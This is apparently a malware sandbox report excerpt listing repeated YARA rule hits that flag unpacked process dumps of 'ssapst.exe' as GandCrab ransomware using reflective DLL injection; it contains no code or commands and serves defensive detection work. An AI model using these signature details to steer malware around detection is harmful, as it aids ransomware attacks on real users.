Source: 35.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 35.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 35.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 35.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.wThN5MTIsw.exe.f4e0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.0.wThN5MTIsw.exe.f4e0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.0.wThN5MTIsw.exe.f4e0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.wThN5MTIsw.exe.f4e0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.0.wThN5MTIsw.exe.f4e0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 19.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 19.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 19.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 19.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 19.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 19.3.ssapst.exe.3520000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 19.3.ssapst.exe.3520000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 19.3.ssapst.exe.3520000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 19.3.ssapst.exe.3520000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 19.3.ssapst.exe.3520000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 30.3.ssapst.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 30.3.ssapst.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 30.3.ssapst.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 30.3.ssapst.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 30.3.ssapst.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 8.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 8.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 8.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 8.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 8.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 25.3.ssapst.exe.36d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 25.3.ssapst.exe.36d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 25.3.ssapst.exe.36d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 25.3.ssapst.exe.36d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 25.3.ssapst.exe.36d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 12.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 12.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 12.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 12.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.3.ssapst.exe.2f70000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 6.3.ssapst.exe.2f70000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 6.3.ssapst.exe.2f70000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 6.3.ssapst.exe.2f70000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 6.3.ssapst.exe.2f70000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 15.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 15.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 15.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 15.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 15.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 25.3.ssapst.exe.36d0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 25.3.ssapst.exe.36d0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 25.3.ssapst.exe.36d0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 25.3.ssapst.exe.36d0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 25.3.ssapst.exe.36d0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 32.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 32.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 32.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 32.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 32.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.3.wThN5MTIsw.exe.3170000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.3.wThN5MTIsw.exe.3170000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.3.wThN5MTIsw.exe.3170000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.3.wThN5MTIsw.exe.3170000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.3.wThN5MTIsw.exe.3170000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 24.3.ssapst.exe.3b60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 24.3.ssapst.exe.3b60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 24.3.ssapst.exe.3b60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 24.3.ssapst.exe.3b60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 24.3.ssapst.exe.3b60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 26.3.ssapst.exe.3830000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 26.3.ssapst.exe.3830000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 26.3.ssapst.exe.3830000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 26.3.ssapst.exe.3830000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 26.3.ssapst.exe.3830000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 12.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 12.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 12.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 12.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 24.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 24.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 24.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 24.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 24.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 30.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 30.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 30.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 30.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 30.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 34.3.ssapst.exe.32a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 34.3.ssapst.exe.32a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 34.3.ssapst.exe.32a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 34.3.ssapst.exe.32a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 34.3.ssapst.exe.32a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 35.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 35.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 35.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 35.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 35.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 18.3.ssapst.exe.3230000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 18.3.ssapst.exe.3230000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 18.3.ssapst.exe.3230000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 18.3.ssapst.exe.3230000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 18.3.ssapst.exe.3230000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 15.3.ssapst.exe.3300000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
